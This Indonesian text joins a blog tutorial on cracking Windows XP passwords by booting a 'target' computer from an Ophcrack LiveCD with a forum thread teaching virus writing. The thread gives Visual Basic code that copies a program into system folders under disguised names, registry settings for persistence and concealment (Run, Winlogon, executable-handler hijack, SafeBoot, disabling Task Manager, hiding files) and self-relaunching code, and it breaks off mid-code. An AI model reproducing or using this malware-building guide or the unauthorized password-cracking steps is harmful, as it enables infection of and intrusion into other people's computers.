Sebelumnya saya pernah membuat tutorial mengenai Hack Windows XP (SP2) Passwords menggunakan pwdump6. Namun, cara tersebut mengharuskan user dengan status admin agar dapat ‘dump’ file HASH dari Windows. Sekarang saya akan menyampaikan cara lain untuk ‘cracking’ password Windows XP (semua versi) dengan menggunakan Ophcrack.
Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.
Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) 
. Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.
Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.
Ok.. langsung aja kita praktek, tapi sebelumnya pasang disclaimer dulu ah… biar bisa ‘lepas’ tanggung jawab kalau tutorial ini disalahgunakan oleh pihak lain 
Disclaimer:
This document was written in the interest of education and care of awareness for unaware people. The author cannot be held responsible for how the topics discussed in this document are applied.
Lets Begin
Pertama kali anda harus mendownload file ISO Ophcrack LiveCD dari sini. Lalu burn ke dalam CD. Dan selanjutnya boot Komputer ‘target’ dari Ophcrack LiveCD, maka akan tampak seperti ini :
Tekan Enter dan biarkan proses Booting berlangsung. Ophcrack akan otomatis masuk ke windows manager menggunakan fluxbox dan langsung menjalankan Ophcrack. Proses pertama adalah mendapatkan file HASH dari partisi yang berisi file Windows kemudian di dump ke file /tmp/ophcrack.tmp
Kemudian tunggu beberapa saat untuk melakukan cracking.
Saya melakukan pengujian menggunakan spesifikasi sebagai berikut : Prosessor AMD +2000 1.6 Ghz, Memori 256 Mb dan dijalankan menggunakan VM-Ware.
Lalu saya menggunakan password yang sangat sederhana, yaitu ‘password123′ dan ‘password’. Hasilnya, Ophcrack mampu menebak kedua password dengan tepat dan hanya membutuhkan waktu 1 Menit!!
Lalu saya coba untuk mengkombinasikan huruf, angka dan simbol dengan memberikan password : ‘p4ssw0rd’ dan ‘p4ssw0rd~!@#’. Hasilnya, Ophcrack mampu menebak ‘p4ssw0rd’ dengan waktu 8 menit dan tidak dapat menemukan ‘p4ssw0rd~!@#’.
Selain menggunakan CD, dengan sedikit modifikasi, Ophcrack juga dapat dijalankan melalui USB Flashdisk. Caranya dengan menginstall SLAX ke dalam USB Flashdisk dan menambahkan modul ophcrack di SLAX serta menyalin Rainbow Tables ke dalam USB, maka Ophcrack LiveUSB sudah dapat dijalankan
Selain itu, untuk mempersingkat waktu, kita dapat mengambil file HASH terlebih dahulu yang terletak di /tmp/ophcrack.tmp kemudian baru di crack di tempat lain tanpa perlu menunggu lagi di komputer target.
Saran
Ibarat pisau bermata dua, Ophcrack dapat menjadi sangat berguna ketika ada seseorang yang lupa password Windows dan ingin me-recovery password dengan cepat dan mudah. Namun disisi lain, Ophcrack dapat juga menjadi ’senjata’ ampuh bagi cracker untuk menjebol Windows dengan cara yang sangat mudah dan cepat. Bahkan kabarnya Ophcrack ini merupakan tools yang paling cepat untuk crack password Windows. Untuk itu ada beberapa hal yang dapat mengurangi resiko agar password komputer kita tidak ‘dibobol’ dengan mudah.
1. Setting password BIOS komputer dan atur urutan boot agar tidak melakukan booting pertama kali dari CD atau USB.
2. Gunakan password yang terdiri dari huruf+angka+simbol agar tidak mudah di crack.
Oph… Crack!!
NB : Cara lain menggunakan ophcrack di Windows dapat dilihat disini
You are Unregistered, please register to gain Full access.
BalasHapusThe Largest Aceh Community > Information and Communication Technology (ICT) > Backdoor, Virus, Trojan, Rootkit » Panduan Pelatihan Pembuatan Virus..
Page 1 of 2 1 2 >
Thread Tools Display Modes
07-07-2007, 10:50 AM #1
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Panduan Pelatihan Pembuatan Virus..
Panduan Pelatihan Pembuatan Virus..
Teman-teman yang mau berkreasi di dalam membuat virus...
Ayo kita bergabung disini...
Tapi satu pesan dari saya....
Tetap harus hati2 aja ya.....
Setiap kita membuat virus kita harus selalu waspada kalau2 nanti terjadi sesuatu ama komputer kita sendiri.....
.....Maksudnya Jaga Komputer anda sendiri dulu dengan benar-benar..
Thank's...
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
Sponsored Links
07-07-2007, 10:53 AM #2
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Infeksi Sistem
Jika kita tanpa sengaja menjalankan/membangkitkan suatu virus (Virus Komputer). Maka yang pasti dilakukan virus tersebut setelah bangkit dari tidurnya adalah menginfeksi system yang ada pada computer target agar virus tersebut melekat pada computer target. Sehingga meskipun komputer tersebut telah di-restart virus tersebut akan tetap aktif dikomputer target tersebut.
Cara kerja virus menginfeksi system:
Melakukan penggandaan ke system.
Langkah pertama sekali yang dilakukan oleh kebanyakan virus ketika user
menjalankan virus dikomputernya adalah melakukan penggandaan kesistem
user tersebut. Proses penggandaan ke system tersebut berfungsi agar virus
tetap aktif pada saat computer direstart. Biasanya hasil penggandaan ke
system mempunyai nama yang hampir dengan nama file system dan ada juga
yang sama dengan nama file system hanya saja lokasi file tersebut berbeda
dengan file aslinya. Contoh (winlogon.exe, lsass.exe, services.exe, csrss.exe,
iexplorer.exe, shell.exe, dll).
Menyeting registry.
Setelah virus tersebut berhasil menggandakan dirinya kesistem barulah virus
tersebut menggunakan registry sebagai benteng pertahanan. Kok
menggunakan registry, seharusnya virus kan mampu melindungi dirinya sendiri
tanpa bantuan registry? Benar, Tapi meskipun begitu banyak sekali
kemungkinan virus tersebut dapat ditanggulangi oleh Antivirus atau software
sejenisnya. Tapi dengan meminjam bantuan registry dari system operasi maka
virus tersebut tersebut dapat melindungi dirinya dengan sangat baik.
Dikarenakan kunci system operasi ada pada registry. Dengan bantuan registry
ini virus mampu menjalankan dirinya kedalam mode safe-mode ataupun
kedalam mode safe-mode dos sekalipun. Dan melalukan pengaturan agar virus
tersebut tetap dalam keadaan tidak terlihat sehingga menyulitkan user untuk
menghapus virus tersebut secara manual.
Mengaktifkan virus yang telah berada disistem.
Setelah virus telah melakukan penggandaan ke system dan menyeting registry
maka yang dilakukan virus selanjutnya adalah menjalankan virus telah ada
disistem sehingga meskipun flashdisk atau pun disket tersebut dikeluarkan
maka virus tersebut akan tetap aktif.
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-07-2007, 11:03 AM #3
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Penggandaan Ke Sistem
Ketika virus dijalankan oleh seseorang maka virus tersebut akan mulai melakukan aktivitasnya sebagai virus yaitu dengan melakukan penggandaan ke system computer (Infeksi ke system). Hal ini dilakukan agar virus tetap berada pada system meskipun sarana media penyebarannya telah dilepas, virus tersebut akan tetap aktif dengan cara mengaktifkan virus yang ter-copy di system sehingga system benarbenar telah terinfeksi oleh virus.
Lokasi folder penggandaan virus pada system:
Windows (Winnt untuk windows NT)
System32 (System untuk windows 9x)
Startup
Application Data
Lokasi diatas biasanya yang paling sering digunakan oleh virus. Mengapa
harus lokasi tersebut? Karena untuk orang awam lokasi tersebut merupakan lokasi dimana file nya tidak boleh dihapus, karena hampir semua file yang ada pada folder tersebut merupakan file penting karena jika terjadi penghapusan terhadap file diperlukan oleh windows maka windows akan mengalami kerusakan. Dan hal ini dimanfaatkan oleh virus untuk melindungi dirinya.
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-07-2007, 01:52 PM #4
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Selain lokasi folder virus juga melakukan perubahan extensi untuk menyamar
agar virus tersebut sulit dicari.
Extensi file yang sering digunakan oleh virus pada saat melakukan penggadaan pada system:
EXE
SCR
COM
PIF
Extensi diatas semuanya memiliki cara akses yang sama. Meskipun terjadi
perubahan extensi, virus tersebut tetap akan berjalan dengan normal. SCR digunakan virus untuk menyamar sebagai Screen Saver sehingga virus tersebut akan aktif jika Screen Saver aktif. Dan tentunya dengan melakukan sedikit perubahan pada registry agar virus tersebut menjadi Default pada Screen Saver.
Agar penyamaran sukses virus juga menggunakan penamaan yang hampir
sama dengan file system atau bahkan memang sama hanya saja lokasi file tersebut yang berbeda.
Penamaan file yang sering digunakan virus pada system:
winlogon.exe
lsass.exe
services.exe
csrss.exe
smss.exe
svchost.exe
System
taskmgr.exe
explorer.exe
iexplorer.exe
notepad.exe
winword.exe
Dengan menggunakan penamaan file seperti itu. Virus tersebut dapat membuat
bingung orang terserang virus tersebut karena mereka tidak tahu apakah file tersebut benar-benar file system yang asli atau yang palsu (virus).
Penamaan file yang bermasalah pada task manager adalah winlogon.exe,
lsass.exe, services.exe, csrss.exe, smss.exe. Karena file tersebut justru akan
dilindungi oleh task manager sehingga tidak dapat matikan prosesnya oleh task
manager.
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-07-2007, 02:06 PM #5
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Berikut ini adalah kode sederhana untuk melakukan penggandaan ke system
Penggunaan perintah FileCopy:
FileCopy sumber,tujuan
Code:
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
FileCopy lokasi & namafile, "C:\virus.exe"
FileCopy lokasi & namafile, "C:\Windows\virus.com"
FileCopy lokasi & namafile, "C:\Windows\virus.pif"
FileCopy lokasi & namafile, "C:\Windows\System32\virus.scr"
End Sub
----
Dari perintah tersebut kita dapat mengetahui bahwa ketika virus dijalankan maka virus tersebut akan melakukan penggandaan diri pada drive C:
C:\virus.exe
C:\Window\virus.com
C:\Windows\virus.pif
C:\Windows\System32\virus.scr
----
Berikut ini adalah proses penggandaan dengan menggunkan perintah API:
Code:
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
CopyFile lokasi & namafile, "C:\virus.exe", 0
CopyFile lokasi & namafile, "C:\Windows\virus.com", 0
CopyFile lokasi & namafile, "C:\windows\virus.pif", 0
CopyFile lokasi & namafile, "C:\windows\system32\virus.scr", 0
End Sub
-------
Cara penggunaannya hampir sama. Jika kita penggunakan perintah API berarti kita akan menggunakan perintah yang terhubung langsung dengan Sistem Operasi, tetapi jika kita menggunakan perintah FileCopy itu berarti kita menggunakan perintah yang telah disediakan oleh visual basic. Setelah visual basic mengenal perintah perintah tersebut baru visual basic akan mengirimkan perintah ke system operasi. Berikut ini adalah kode penggandaan pada tempat-tempat yang dianggap penting oleh Windows. Siapkan satu form dengan 5 buah command button dan satu buah module.
Ketikan pada Form1:
Code:
Dim lokasi As String
Dim namafile As String
Dim tujuan As String
Private Sub Command1_Click()
tujuan = GetSpecialfolder(CSIDL_DESKTOP)
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command2_Click()
tujuan = GetSpecialfolder(CSIDL_PERSONAL)
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command3_Click()
tujuan = GetSpecialfolder(CSIDL_STARTUP)
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command4_Click()
tujuan = GetWindowsPath
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command5_Click()
tujuan = GetSystemPath
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
End Sub
-----
Ketikan pada module:
Code:
Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Public Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" _
(ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Public Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias _
"SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias _
"GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias _
"GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function CreateDirectory Lib "kernel32" Alias _
"CreateDirectoryA" (ByVal lpPathName As String, _
lpSecurityAttributes As SECURITY_ATTRIBUTES) As Long
Public Type SHITEMID
cb As Long
abID As Byte
End Type
Public Type ITEMIDLIST
mkid As SHITEMID
End Type
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Enum SFolder
CSIDL_DESKTOP = &H0 'menunjukkan folder virtual yang menyatakan root untuk
'semua namespace (/Desktop)
CSIDL_PROGRAMS = &H2 'menunjukkan folder sistem yang berisi grup program
'user (/Programs)
CSIDL_CONTROLS = &H3 'menunjukkan folder virtual yang berisi ikon-ikon
'aplikasi Control Panel (/Control Panel)
CSIDL_PRINTERS = &H4 'menunukkan folder virtual yang berisi printer-
'printer yang diinstall (/Printers)
CSIDL_PERSONAL = &H5 'menunjukkan folder sistem yang digunakan untuk
'menyimpan dokumen umum user (/My Document)
CSIDL_FAVORITES = &H6 'menunjukkan folder yang berisi item-item favorite
'user (/Favorites)
CSIDL_STARTUP = &H7 'menunjukkan folder yang berisi grup program StartUp
'user (/Startup)
CSIDL_RECENT = &H8 'menunjukkan folder sistem yang berisi dokumen-dokumen
'yang sering digunakan (/Recent)
CSIDL_SENDTO = &H9 'menunjukkan folder yang berisi item menu Send To
'(/Send To)
CSIDL_BITBUCKET = &HA 'menunjukkan folder sistem yang berisi objek file
'pada RecycleBin user (/Recycle Bin)
CSIDL_STARTMENU = &HB 'menunjukkan folder sistem yang berisi item-item
'menu Start (/StartMenu)
CSIDL_DESKTOPDIRECTORY = &H10 'menunjukkan folder sistem yang dapatkan
'digunakan untuk menyimpan objek file secara
'fisik pada desktop
CSIDL_DRIVES = &H11 'menunjukkan folder yang berisi segala sesuatu pada
'komputer lokal (/My Computer)
CSIDL_NETWORK = &H12 'menunjukkan folder yang berisi objek link yang
'kemungkinan ada pda folder virtual My Network Places
'(/My Network Places)
CSIDL_NETHOOD = &H13 'menunjukkan folder yang menyatakan root dari
'hierarki namespace network (/NetHood)
CSIDL_FONTS = &H14 'menunjukkan folder yang berisikan font (/FONT)
CSIDL_TEMPLATES = &H15 'menunjukkan folder yang digunakan untuk menyimpan
'dokumen template (/Template)
End Enum
'Get special folder
Public Function GetSpecialfolder(JenisFolder As SFolder) As String
Dim r As Long
Dim IDL As ITEMIDLIST
'get special folder
r = SHGetSpecialFolderLocation(100, JenisFolder, IDL)
If r = NOERROR Then
'create buffer
Path$ = Space$(512)
'Get path from IDList(IDL)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
'Remove chr$(0)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function
'Get System Path
Public Function GetSystemPath() As String
On Error Resume Next
Dim Buffer As String * 255
Dim x As Long
x = GetSystemDirectory(Buffer, 255)
GetSystemPath = Left(Buffer, x) & "\"
End Function
'Get Windows Path
Public Function GetWindowsPath() As String
On Error Resume Next
Dim Buffer As String * 255
Dim x As Long
x = GetWindowsDirectory(Buffer, 255)
GetWindowsPath = Left(Buffer, x) & "\"
End Function
Dengan menggunakan perintah diatas kita dapat membuat kode untuk penggandaan
pada folder yang dianggap penting oleh windows...
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 03:31 PM #6
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Setting Registry
Kali ini kita akan membahas lebih dalam tentang bagaimana cara virus
menyeting registry. Dan settingan registry seperti apa yang biasa dilakukan virus.
Virus yang berjalan pada system operasi windows tak dapat lepas dari bantuan registry yang dapat membuat virus tersebut mampu memiliki daya tahan yang sangat kuat sehingga sulit sekali untuk dimusnahkan. Registry dimanfaatkan virus sebagai suatu tameng atau benteng pertahanan yang dapat melindunginya dari berbagai serangan-serangan yang dapat membuat dirinya (virus) musnah dari computer yang telah terinfeksi.
Misalkan kita telah berhasil mematikan suatu virus dengan menggunakan
program task manager ataupun program sejenisnya tanpa melakukan pembersihan pada registry. Dimana virus telah memasang suatu kunci pada registry yang akan mengaktifkan dirinya jika user menjalankan suatu aplikasi, maka sudah bisa pastikan bahwa virus tersebut akan aktif kembali.
Fungsi untuk menyeting registry yang digunakan oleh virus tidak banyak virus
hanya memerlukan suatu fungsi untuk membuat kunci (Biasanya DWORD dan
STRING) dan menghapus suatu kunci resgitry (Biasanya jarang digunakan).
Code Pembuatan Key DWORD Pada Registry:
Code:
Public Function CreateDwordValue(hKey As REG, Subkey As String, _
strValueName As String, dwordData As Long) As Long
On Error Resume Next
Dim ret As Long
‘Buka Key
RegCreateKey hKey, Subkey, ret
‘Buat Key Dword Value
CreateDwordValue = RegSetValueEx(ret, strValueName, 0, _
REG_DWORD, dwordData, 4)
‘Tutup Key
RegCloseKey ret
End Function
Code Pembuatan Key STRING Pada Registry:
Code:
Public Function CreateStringValue(hKey As REG, Subkey As String, _
RTypeStringValue As TypeStringValue, strValueName As String, _
strData As String) As Long
On Error Resume Next
Dim ret As Long
‘Buka Key
RegCreateKey hKey, Subkey, ret
‘Buat Key String Value
CreateStringValue = RegSetValueEx(ret, strValueName, 0, _
RTypeStringValue, ByVal strData, Len(strData))
‘Tutup Key
RegCloseKey ret
End Function
Code Penghapus Key:
Code:
Public Function DeleteKey(hKey As REG, Subkey As String) As Long
On Error Resume Next
Dim ret As Long
‘Buka Key
RegCreateKey hKey, Subkey, ret
'Hapus key
RegDeleteKey Result, ""
'Tutup handle
RegCloseKey Result
End Function
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 04:23 PM #7
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Macam-macam setingan registry yang dibuat virus:
Pada key Run.
Key ini digunakan virus agar virus aktif pada saat windows melakukan logon.
Contoh:
Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Jenis Nilai : String
Nama Kunci : Virus
Nilai : C:\Windows\Virus.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Jenis Kunci : String
Nama Kunci : Virus
Nilai : C:\Windows\Virus.exe
Penamaan suatu nama kunci dan nilai dapat anda ganti dan disesuaikan
dengan apa yang anda buat
Pada Key Explorer.
Key ini digunakan virus untuk melindungi dirinya agar tetap tersembunyi. Virus
dapat melakukan berbagai manipulasi explorer pada key ini.
Contoh:
Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Poli
cies\Explorer\
Jenis Nilai : DWORD
Nama Kunci : NoFolderOptions
Nilai : 1
Pada Key System.
Key ini juga digunakan virus untuk melindungi dirinya. Dengan key ini virus
dapat menonaktifkan TaskManager dan Registry.
Contoh:
Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Poli
cies\System\
Jenis Nilai : DWORD
Nama Kunci : DisableTaskMgr
Nilai : 1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\
Jenis Nilai: DWORD
Nama Kunci: DisableCMD
Nilai: 1
Pada Key Winlogon.
Key ini digunakan virus untuk mengaktifkan dirinya sebelum/sesudah tampilan
windows keluar.
Contoh:
Code:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon
Jenis Nilai : String
Nama Kunci : Shell
Nilai : Explorer.exe "C:\Windows\IExplorer.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon
Jenis Kunci : String
Nama Kunci : Userinit
Nilai :
C:\Windows\System32\userinit.exe,C:\Windows\IExplorer.exe
Pada Key Dekstop.
Key ini digunakan virus sebagai sarana penyamaran virus sebagai screen
saver sehingga pada screen saver berjalan bukan screen saver yang berjalan
tapi melainkan virus yang berjalan.
Contoh:
Code:
HKEY_CURRENT_USER\Control Panel\Desktop\
Jenis Kunci : String
Nama Kunci : SCRNSAVE.EXE
Nilai : C:\Windows\System32\virus.SCR"
HKEY_CURRENT_USER\Control Panel\Desktop\
Jenis Kunci : String
Nama Kunci : ScreenSaverIsSecure
Nilai : 0
HKEY_CURRENT_USER\Control Panel\Desktop
Jenis Kunci : String
Nama Kunci : ScreenSaveTimeOut
Nilai : 600
Pada Key AeDebug.
Key ini hampir sama seperti screen saver hanya saja, jika terjadi suatu debug
pada windows maka tanpa sadar windows telah menjalankan virus.
Contoh:
Code:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\AeDebug
Jenis Kunci : String
Nama Kunci : Debugger
Nilai : "C:\Windows\System32\Shell.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\AeDebug
Jenis Kunci : String
Nama Kunci : Auto
Nilai : 1
Pada Key Command.
Key ini digunakan virus agar virus selalu aktif. Fungsi pengaktifannya jika user
menjalankan suatu aplikasi maka yang dijalankan pertama kali adalah virus
baru virus tersebut akan menjalankan aplikasi tersebut agar tidak
mencurigakan. Dengan key ini virus memegang akses penuh terhadap suatu
aplikasi. Virus dapat menjalankan suatu apikasi yang dia jalankan atau pun
sebaliknya.
Contoh:
Code:
HKEY_CLASSES_ROOT\exefile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
HKEY_CLASSES_ROOT\lnkfile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
HKEY_CLASSES_ROOT\piffile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
HKEY_CLASSES_ROOT\batfile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
HKEY_CLASSES_ROOT\comfile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
Ket Nama Kunci = Kosong artinya (Default).
Pada Key Safe Boot.
Key ini digunakan virus agar virus tetap aktif. Pada saat windows berjalan pada
mode safe-mode atau pun dos sehingga user tidak akan dapat menghapus
virus ini pada mode safe mode.
Contoh:
Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
Jenis Kunci : String
Nama Kunci : AlternateShell
Nilai : C:\Windows\Virus.exe
Pada Key exefile.
Key ini digunakan virus untuk melakukan manipulasi file agar virus tersebut
tetap tersamar sehingga sulit untuk membedahkan mana file yang asli dan
mana yang virus.
Code:
HKEY_CLASSES_ROOT\exefile
Jenis Kunci : String
Nama Kunci :
Nilai : File Folder
Nama Kunci = Kosong artinya (Default).
Pada Key CabinetState.
Key ini digunakan virus sebagai suatu sarana yang dapat membantu
penyeberan jika user menggunakan windows explorer. Karena address bar
windows explorer akan menampilkan alamat file yang sedang dibuka oleh user
dengan lengkap.
Contoh:
Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
orer\CabinetState
Jenis Kunci : DWORD
Nama Kunci : FullPathAddress
Nilai : 1
Pada Key Advanced.
Key ini digunakan virus untuk menyembunyikan dirinya. Agar settingan
windows explorer tetap tidak akan menampilkan file yang dalam keadaan
tersembunyi.
Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
orer\Advanced\
Jenis Kunci : DWORD
Nama Kunci : HideFileExt
Nilai : 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
orer\Advanced\
Jenis Kunci : DWORD
Nama Kunci : Hidden
Nilai : 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
orer\Advanced
Jenis Kunci : DWORD
Nama Kunci : ShowSuperHidden
Nilai : 0
Anda dapat bereksplorasi lagi lebih banyak dengan registry agar dapat
membuat suatu benteng keamanan yang sangat bagus sehingga virus tersebut sulit untuk ditaklukan.
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 04:28 PM #8
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Pengaktifan Virus pada Sistem
Jika virus telah melakukan penggandaan di system computer maka virus
tersebut akan mengaktifkan hasil penggandaannya yang telah berada disistem,
sehingga meskipun flashdisk atau pun media penyimpanan lainnya yang digunakan sebagai suatu sarana penyebaran virus tersebut dilepas maka virus tersebut akan tetap aktif.
Untuk melakukan pengaktifan virus yang telah berada pada system computer
virus tersebut hanya melakukan suatu perintah untuk menjalankan virus yang berada di sisem computer tersebut dengan perintah Shell atau dengan perintah ShellExecute.
Pangaktifan akan dilakukan bila terjadi suatu proses atau pemanggilan suatu
aplikasi. Virus biasanya akan memanggil dirinya kembali sehingga jika salah virus dimatikan dari task manager maka virus yang prosesnya belum dimatikan akan memanggilnya kembali. Jadi tehnik ini cukup menyulit sesorang membunuh virus tersebut.
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 04:31 PM #9
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Code untuk melakukan pengaktifan:
Code:
Shell Lokasi+namafile,Window Style
Berikut ini adalah contoh sederhana:
Kamu siapkan terlebih dahulu satu buah command button.
Code:
Private Sub Command1_Click()
Dim lokasi As String, namafile As String
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
Shell lokasi & namafile & ".exe", vbNormalFocus
End Sub
Jadi dengan perintah tersebut kita mampu menjalankan program apapun termasuk juga virus. Extensi nggak masalah karena jika membuat suatu file execute tanpa extensi, kita bisa menjalankannya dengan perintah shell tapi jika menggunakan langsung double-click pada windows tidak akan bisa.
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 04:38 PM #10
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Selanjutnya membuat suatu program yang tidak bisa ditutup dengan menge-click
tombol x pada windows:
Code:
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
End Sub
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile & ".exe", vbNormalFocus
End Sub
Dengan perintah diatas maka program tersebut akan melakukan pemanggilan dirinya kembali ketika ditutup dengan menekan tombol x di sudut kanan atas.
Itu bisa terjadi dengan mengetikan perintah shell pada event Form_Unload
Berikutnya code pengaktifan setiap detik
Siapkan sebuah timer dengan Interval=1000 artinya akan menjalankan suatu perintah pada event timer setiap satu detik. 1 detik= 1000 millidetik.
Code:
Dim lokasi As String
Dim namafile As String
Dim detik As Integer
Private Sub Form_Load()
If App.PrevInstance Then End
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
End Sub
Private Sub Timer1_Timer()
Shell lokasi & namafile, vbNormalFocus
End Sub
Dengan mengisikan perintah pengaktifan pada event Timer maka program akan
melakukan pengaktifan setiap satu detik.
Disini kita juga harus menyiap penganan agar program hanya dapat berjalan sekali saja, dengan perintah:
Code:
If App.PrevInstance Then End
Pada code berikut program akan melakukan pengaktifan jika suatu program
mendapatkan focus:
Code:
